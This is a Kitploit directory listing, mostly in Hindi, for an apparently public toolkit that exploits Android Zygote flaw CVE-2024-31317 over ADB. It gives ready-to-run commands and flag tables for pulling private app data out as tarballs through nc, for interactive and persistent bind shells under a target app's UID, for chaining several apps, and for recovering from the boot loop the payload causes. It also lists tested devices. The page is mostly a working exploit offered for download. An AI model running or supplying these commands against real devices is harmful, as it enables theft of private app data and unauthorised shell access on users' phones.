Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
zygote-CVE-2024-31317 — यह एक टूलकिट है जो CVE-2024-31317 का उपयोग करके ADB के माध्यम से निजी ऐप डेटा निकालता है या किसी ऐप के UID के साथ एक शेल स्पॉन करता है। | Kitploit
उपकरण/GitHubGitHub/vnescape/zygote-cve-2024-31317
एंड्रॉइड सुरक्षाभेद्यता विश्लेषणशोषणडेटा निष्कासनपेनिट्रेशन टेस्टिंगमोबाइल सुरक्षा
GitHubvnescape/zygote-cve-2024-31317

zygote-CVE-2024-31317

यह एक टूलकिट है जो CVE-2024-31317 का उपयोग करके ADB के माध्यम से निजी ऐप डेटा निकालता है या किसी ऐप के UID के साथ एक शेल स्पॉन करता है।

रिपॉजिटरी देखें
312 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Zygote Toolkit - CVE-2024-31317

यह एक टूलकिट है जो CVE-2024-31317 का उपयोग करके ADB के माध्यम से निजी ऐप डेटा निकालता है या किसी ऐप के UID के साथ शेल चलाता है। यह भेद्यता एंड्रॉइड संस्करण 9 से 14 को प्रभावित करती है जो सुरक्षा पैच स्तर 2024-06-01 या उससे कम पर चल रहे हैं। परीक्षण किए गए उपकरणों का समर्थन मैट्रिक्स नीचे दिया गया है।

पूर्वापेक्षाएँ

डेबियन/उबंटू (सिस्टम पैकेज)

root@kitploit:~
sudo apt update
sudo apt install adb openjdk-17-jdk-headless android-sdk android-sdk-build-tools
export ANDROID_HOME=/usr/lib/android-sdk
export PATH=$PATH:$ANDROID_HOME/build-tools/34.0.0:$ANDROID_HOME/platform-tools

export पंक्तियों को स्थायित्व के लिए ~/.bashrc (या समकक्ष) में जोड़ें।

सत्यापित करें

root@kitploit:~
./setup.sh

त्वरित आरंभ

root@kitploit:~
# Build and install the carrier APK (auto-builds from source)
python3 cve_2024_31317.py com.google.android.youtube --setup --rebuild -y

# Extract an app's data directory
python3 cve_2024_31317.py -d DEVICE_SERIAL -E -o app_data.tar -y com.example.app

एक्सप्लॉइट पहले रन पर Hijack.java और AndroidManifest.xml से सब कुछ बनाता है।

उपयोग

root@kitploit:~
python3 cve_2024_31317.py [flags] [package]

मोड्स

विकल्प

उदाहरण

root@kitploit:~
# Extraction
python3 cve_2024_31317.py -d DEVICE -E -o youtube.tar -y com.google.android.youtube

# Check if device is vulnerable
python3 cve_2024_31317.py -d DEVICE --check-vuln

# Interactive bind shell
python3 cve_2024_31317.py -d DEVICE -i -y com.google.android.youtube

# Persistent shell on port 7777
python3 cve_2024_31317.py -d DEVICE -S 7777 -y com.google.android.youtube

# Multi-app chain
python3 cve_2024_31317.py -d DEVICE -E -y --chain-targets "app1,app2,app3"

# Recovery only (fix boot loop)
python3 cve_2024_31317.py -d DEVICE --recover

स्रोत से निर्माण

सब कुछ रनटाइम पर स्रोत से बनता है। बिल्ड पाइपलाइन Android SDK से javac (JDK 17+), d8, aapt, zipalign, और apksigner का उपयोग करती है।

  • x86_64 → arm64: उपकरण मूल रूप से चलते हैं; DEX आउटपुट आर्किटेक्चर-स्वतंत्र है
  • ARM64 → arm64: सब कुछ मूल रूप से चलता है (Adoptium ARM64 JDK बिल्ड प्रदान करता है)

पासकोड

यदि उपकरण में पासकोड है, तो यह BFU (Before First Unlock) शुरू करता है। एक्सप्लॉइट आपके अनलॉक करने तक 5 मिनट तक sys.user.0.ce_available को पोल करता है। एक्सप्लॉइट की अवधि के लिए पासकोड हटाने की सिफारिश की जाती है।

परीक्षण किए गए उपकरण

† Samsung One UI विशिष्ट: ZNJECT इंजेक्शन सफल होता है और -E निष्कर्षण काम करता है, लेकिन toybox nc ServerSocket बाइंड शेल कभी नहीं खुलता। समस्या के मूल कारण का पता लगाने के लिए और शोध की आवश्यकता है।

पुनर्प्राप्ति

पेलोड hidden_api_blacklist_exemptions में रहता है जो अगले बूट पर बूट लूप का कारण बन सकता है। रीसेट करने के लिए --recover चलाएँ:

root@kitploit:~
python3 cve_2024_31317.py -d DEVICE --recover
टूल डाउनलोड करें
फ़्लैगविवरण
-Eग्रैंडचाइल्ड tar | nc के माध्यम से ऐप डेटा निकालें (मूल प्रक्रिया के मारे जाने पर भी जीवित रहता है)
-iइंटरैक्टिव बाइंड शेल REPL
-S PORTस्थायी शेल (FIFO एकल-पोर्ट प्रोटोकॉल)
--recoverसेटिंग रीसेट करें, बूट हैंग / Zygote डिग्रेडेशन ठीक करें
--setupकेवल कैरियर APK बनाएं + इंस्टॉल करें (कोई इंजेक्शन नहीं)
--list-appsUID और sys/user प्रकार के साथ सभी इंस्टॉल किए गए पैकेज सूचीबद्ध करें
--check-vulnजांचें कि क्या उपकरण CVE-2024-31317 के प्रति संवेदनशील है और बाहर निकलें
फ़्लैगविवरण
-o file.tarनिष्कर्षण टारबॉल के लिए आउटपुट पथ
-y / --yesपुष्टिकरण संकेतों को छोड़ें
--retries Nप्रति लक्ष्य अधिकतम पुनः प्रयास (डिफ़ॉल्ट 3)
--chain-targets "pkg1,pkg2"एक सत्र में कई ऐप निकालें
--chain-file file.jsonऊपर जैसा, JSON फ़ाइल से
--reboot-afterनिष्कर्षण के बाद रीबूट करें (Zygote को पुनर्स्थापित करता है)
--reboot-every Nहर N चेन लक्ष्यों के बाद रीबूट करें
--coldवार्म-अप छोड़ें; अगले ऐप लॉन्च के लिए पेलोड संग्रहीत करें
--port PORTबाइंड शेल पोर्ट (डिफ़ॉल्ट 8888)
-d SERIALविशिष्ट उपकरण को लक्षित करें (कई कनेक्टेड)
--rebuildकैरियर APK को पुनर्निर्माण के लिए बाध्य करें
उपकरणएंड्रॉइडAPIपैचABI-E-i-S--chain--cold--retries--recover--reboot-after--list-apps--check-vulnस्कोर
Google Pixel 312312021-10-05arm64-v8a✅✅✅✅✅✅✅✅✅✅12/12
Samsung SM-P615 Tab S6 Lite13332024-05-01arm64-v8a✅❌†❌†✅✅❌†✅✅✅✅9/12
sdk_gphone_x86_64 (emulator)10292019-09-05x86_64✅✅✅✅✅✅✅✅✅✅12/12